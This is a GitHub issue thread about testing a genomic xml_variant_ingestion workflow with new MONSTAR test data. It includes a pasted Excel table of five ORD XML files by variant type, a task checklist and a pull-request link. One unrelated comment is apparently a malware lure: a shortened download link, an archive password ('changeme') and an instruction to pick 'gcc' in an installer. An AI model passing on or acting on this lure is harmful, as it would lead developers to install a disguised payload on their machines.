### ISSUE TITLE
Test xml_variant_ingestion workflow with new test data from MONSTAR

### ISSUE THREAD

**Issue by guanqiaofeng** [icgc-argo/workflow-roadmap#455]
<html xmlns:v="urn:schemas-microsoft-com:vml"
xmlns:o="urn:schemas-microsoft-com:office:office"
xmlns:x="urn:schemas-microsoft-com:office:excel"
xmlns="http://www.w3.org/TR/REC-html40">

<head>

<meta name=ProgId content=Excel.Sheet>
<meta name=Generator content="Microsoft Excel 15">
<link id=Main-File rel=Main-File
href="file:////Users/gfeng/Library/Group%20Containers/UBF8T346G9.Office/TemporaryItems/msohtmlclip/clip.htm">
<link rel=File-List
href="file:////Users/gfeng/Library/Group%20Containers/UBF8T346G9.Office/TemporaryItems/msohtmlclip/clip_filelist.xml">
<style>

</style>
</head>

<body link="#467886" vlink="#96607D">

  | short-variants | copy-number-alterations | rearrangements
-- | -- | -- | --
ORD-0000001-01.xml | Y | Y |  
ORD-0000002-01.xml | Y |   |  
ORD-0000003-01.xml | Y |   |  
ORD-0000004-01.xml | Y |   |  
ORD-0000005-01.xml | Y | Y | Y

</body>

</html>

**Comment by guanqiaofeng** [comment]
- [x] Need to test current workflow run properly for `short-variants` and `rearrangements`

- [x] Need to extend workflow for `copy-number-alterations`

- [x] Need to add flexibility in workflow to handle different types of variation provided by file

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by guanqiaofeng** [comment]
https://github.com/icgc-argo-workflows/xml_variant_ingestion/pull/3
